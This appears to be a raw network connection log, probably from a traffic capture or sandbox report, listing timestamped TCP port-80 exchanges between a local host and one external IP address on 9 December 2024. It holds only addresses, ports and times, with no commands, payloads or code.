                                                                                              Dec 9, 2024 16:00:43.609520912 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.662601948 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.663325071 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.783376932 CET804974837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:43.783483028 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.783521891 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:43.783600092 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.783799887 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.904706955 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:44.141036987 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:44.260438919 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.063651085 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.109560013 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.298460960 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.422065020 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.423083067 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.423795938 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.542907000 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.542989016 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.543292999 CET804975237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.543457031 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.543610096 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.662828922 CET804975237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.890894890 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.010474920 CET804975237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.423440933 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.438292980 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.542954922 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.543041945 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.543173075 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.558509111 CET804975237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.558569908 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.625741959 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.663743019 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.745148897 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.745260954 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.745899916 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.865310907 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.891196966 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:47.010734081 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:47.010747910 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:47.094175100 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:47.213581085 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:47.819869041 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:47.922050953 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.015729904 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.054800987 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.125128984 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.126625061 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.254266024 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.312669992 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.375140905 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.375488043 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.375854969 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.495896101 CET804976137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.495912075 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.496001959 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.496021032 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.496217012 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.496987104 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.500322104 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.616125107 CET804976137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.846326113 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.965730906 CET804976137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:49.777524948 CET804976137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:49.890777111 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.010581017 CET804976137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:50.093940020 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.143243074 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.262690067 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:50.264722109 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.264944077 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.384267092 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:50.609761000 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.729187965 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:51.567677975 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:51.797019005 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:51.802381992 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:51.923039913 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:51.924633980 CET4977380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:52.042902946 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:52.042965889 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:52.043904066 CET804977337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:52.043970108 CET4977380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:52.044157982 CET4977380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:52.163495064 CET804977337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:52.390973091 CET4977380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:52.510375023 CET804977337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:53.066029072 CET4977480192.168.2.437.44.238.250
Dec 9, 2024 16:00:53.066215038 CET  49773  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:53.186245918 CET  80     49774  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:53.186894894 CET  80     49773  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:53.186985970 CET  49773  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:53.186990023 CET  49774  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:53.187114000 CET  49774  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:53.198304892 CET  49776  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:53.307024956 CET  80     49774  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:53.317698956 CET  80     49776  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:53.319459915 CET  49776  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:53.319574118 CET  49776  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:53.439506054 CET  80     49776  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:53.531476974 CET  49774  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:53.650949001 CET  80     49774  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:53.650962114 CET  80     49774  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:53.672122002 CET  49776  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:53.791953087 CET  80     49776  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:54.486439943 CET  80     49774  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:54.547897100 CET  49774  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:54.591447115 CET  80     49776  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:54.722563982 CET  80     49774  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:54.797036886 CET  49776  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:54.812705994 CET  49774  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:54.826522112 CET  80     49776  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:54.953603983 CET  49774  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:54.953670025 CET  49776  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:54.954328060 CET  49781  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:55.073707104 CET  80     49774  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:55.073864937 CET  80     49781  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:55.073930979 CET  49774  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:55.074007034 CET  49781  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:55.074157000 CET  49781  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:55.075186014 CET  80     49776  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:55.076630116 CET  49776  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:55.193799973 CET  80     49781  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:55.422173977 CET  49781  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:55.541682005 CET  80     49781  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:56.392175913 CET  80     49781  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:56.484544992 CET  49781  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:56.626420021 CET  80     49781  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:56.627448082 CET  49781  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:56.747414112 CET  80     49781  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:56.747665882 CET  49781  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:56.828521967 CET  49787  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:56.949196100 CET  80     49787  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:56.949280977 CET  49787  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:56.949455976 CET  49787  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:57.068974972 CET  80     49787  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:57.297116041 CET  49787  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:57.417016983 CET  80     49787  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:58.219134092 CET  80     49787  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:58.281416893 CET  49787  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:58.454638958 CET  80     49787  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:58.597618103 CET  49787  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:58.627332926 CET  49787  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:58.628635883 CET  49793  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:58.747251034 CET  80     49787  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:58.747910023 CET  80     49793  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:58.747967958 CET  49787  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:58.747997999 CET  49793  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:58.748187065 CET  49793  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:58.867348909 CET  80     49793  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:59.094018936 CET  49793  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:59.213852882 CET  80     49793  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:59.745484114 CET  49794  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:59.745738983 CET  49793  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:59.865673065 CET  80     49794  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:59.865751028 CET  49794  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:59.866218090 CET  80     49793  37.44.238.250  192.168.2.4
Dec 9, 2024 16:00:59.866274118 CET  49793  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:59.870028019 CET  49794  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:59.982692003 CET  49796  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:00:59.989315987 CET  80     49794  37.44.238.250  192.168.2.4
Dec 9, 2024 16:01:00.102602005 CET  80     49796  37.44.238.250  192.168.2.4
Dec 9, 2024 16:01:00.102672100 CET  49796  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:01:00.102823019 CET  49796  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:01:00.219016075 CET  49794  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:01:00.222448111 CET  80     49796  37.44.238.250  192.168.2.4
Dec 9, 2024 16:01:00.338701963 CET  80     49794  37.44.238.250  192.168.2.4
Dec 9, 2024 16:01:00.338717937 CET  80     49794  37.44.238.250  192.168.2.4
Dec 9, 2024 16:01:00.453352928 CET  49796  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:01:00.573187113 CET  80     49796  37.44.238.250  192.168.2.4
Dec 9, 2024 16:01:01.136001110 CET  80     49794  37.44.238.250  192.168.2.4
Dec 9, 2024 16:01:01.312674999 CET  49794  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:01:01.373186111 CET  80     49796  37.44.238.250  192.168.2.4
Dec 9, 2024 16:01:01.422053099 CET  49796  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:01.246844053 CET  80     49794  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:01.297118902 CET  49794  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:01.391387939 CET  80     49796  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:01.437838078 CET  49796  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:01.541124105 CET  49794  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:01.541214943 CET  49796  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:01.541754007 CET  49931  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:01.661652088 CET  80     49794  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:01.661725044 CET  49794  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:01.661931038 CET  80     49931  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:01.661999941 CET  49931  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:01.662081003 CET  80     49796  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:01.662130117 CET  49796  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:01.662130117 CET  49931  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:01.781524897 CET  80     49931  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:02.015983105 CET  49931  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:02.135510921 CET  80     49931  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:02.939073086 CET  80     49931  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:02.984622002 CET  49931  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:03.182363987 CET  80     49931  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:03.234690905 CET  49931  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:03.312125921 CET  49931  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:03.312596083 CET  49937  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:03.432708979 CET  80     49931  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:03.432768106 CET  49931  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:03.432818890 CET  80     49937  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:03.432879925 CET  49937  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:03.433032036 CET  49937  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:03.552468061 CET  80     49937  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:03.781613111 CET  49937  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:03.901073933 CET  80     49937  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:04.715818882 CET  80     49937  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:04.765958071 CET  49937  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:04.941869974 CET  80     49937  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:04.948070049 CET  80     49761  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:04.948157072 CET  49761  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:05.000245094 CET  49937  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:05.060808897 CET  49937  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:05.061486959 CET  49941  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:05.180962086 CET  80     49941  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:05.180975914 CET  80     49937  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:05.181052923 CET  49937  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:05.181061029 CET  49941  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:05.181252956 CET  49941  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:05.304582119 CET  80     49941  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:05.532155037 CET  49941  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:05.651469946 CET  80     49941  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:06.267283916 CET  49945  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:06.267539978 CET  49941  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:06.388078928 CET  80     49945  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:06.388216972 CET  49945  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:06.388338089 CET  49945  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:06.388421059 CET  80     49941  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:06.388475895 CET  49941  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:06.389385939 CET  49946  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:06.507666111 CET  80     49945  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:06.508871078 CET  80     49946  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:06.508979082 CET  49946  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:06.509105921 CET  49946  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:06.628591061 CET  80     49946  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:06.734760046 CET  49945  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:06.854259014 CET  80     49945  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:06.854296923 CET  80     49945  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:06.859740973 CET  49946  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:06.979206085 CET  80     49946  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:07.658607006 CET  80     49945  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:07.703392029 CET  49945  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:07.778985977 CET  80     49946  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:07.828423977 CET  49946  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:07.918591976 CET  80     49945  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:07.968996048 CET  49945  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:08.171662092 CET  80     49946  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:08.219054937 CET  49946  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:08.352643013 CET  49945  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:08.352665901 CET  49946  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:08.353389025 CET  49951  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:08.472953081 CET  80     49945  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:08.473054886 CET  49945  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:08.473494053 CET  80     49951  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:08.473505974 CET  80     49946  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:08.473577976 CET  49951  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:08.473604918 CET  49946  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:08.473742962 CET  49951  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:08.593122005 CET  80     49951  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:08.828561068 CET  49951  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:08.948143005 CET  80     49951  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:09.746181011 CET  80     49951  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:09.797295094 CET  49951  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:09.981959105 CET  80     49951  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:10.031488895 CET  49951  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:10.107765913 CET  49957  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:10.227386951 CET  80     49957  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:10.227507114 CET  49957  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:10.227649927 CET  49957  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:10.346936941 CET  80     49957  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:10.578520060 CET  49957  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:10.698091030 CET  80     49957  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:11.573611021 CET  80     49957  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:11.625245094 CET  49957  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:11.799288034 CET  80     49957  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:11.844057083 CET  49957  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:11.919651031 CET  49957  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:11.920125961 CET  49963  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:12.039907932 CET  80     49963  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:12.039926052 CET  80     49957  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:12.040041924 CET  49957  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:12.040199041 CET  49963  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:12.040199041 CET  49963  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:12.161654949 CET  80     49963  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:12.390945911 CET  49963  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:12.511185884 CET  80     49963  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:12.923856974 CET  49965  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:12.924108028 CET  49963  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:13.047103882 CET  80     49965  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:13.047168016 CET  49965  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:13.047301054 CET  49965  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:13.047504902 CET  80     49963  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:13.047547102 CET  49963  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:13.050934076 CET  49966  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:13.167202950 CET  80     49965  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:13.170758963 CET  80     49966  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:13.170865059 CET  49966  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:13.171066999 CET  49966  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:13.290359020 CET  80     49966  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:13.406625986 CET  49965  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:13.516032934 CET  49966  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:13.526386023 CET  80     49965  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:13.526406050 CET  80     49965  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:13.637332916 CET  80     49966  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:14.318631887 CET  80     49965  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:14.375247955 CET  49965  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:14.442814112 CET  80     49966  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:14.484654903 CET  49966  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:14.553776026 CET  80     49965  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:14.609652996 CET  49965  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:14.677802086 CET  80     49966  37.44.238.250  192.168.2.4
Dec 9, 2024 16:02:14.734625101 CET  49966  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:14.794961929 CET  49951  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:14.799699068 CET  49965  80     192.168.2.4    37.44.238.250
Dec 9, 2024 16:02:14.799756050 CET  49966  80     192.168.2.4    37.44.238.250
                                                                                              Dec 9, 2024 16:02:14.800350904 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.919770956 CET804996537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:14.919822931 CET4996580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.920146942 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:14.920216084 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.920418978 CET804996637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:14.920442104 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.920471907 CET4996680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:15.041776896 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:15.265995979 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:15.386554956 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:16.215329885 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:16.359622955 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.449781895 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:16.564675093 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.576666117 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.576775074 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.696156979 CET804997737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:16.696261883 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.696295977 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:16.696410894 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.696455956 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.815879107 CET804997737.44.238.250192.168.2.4
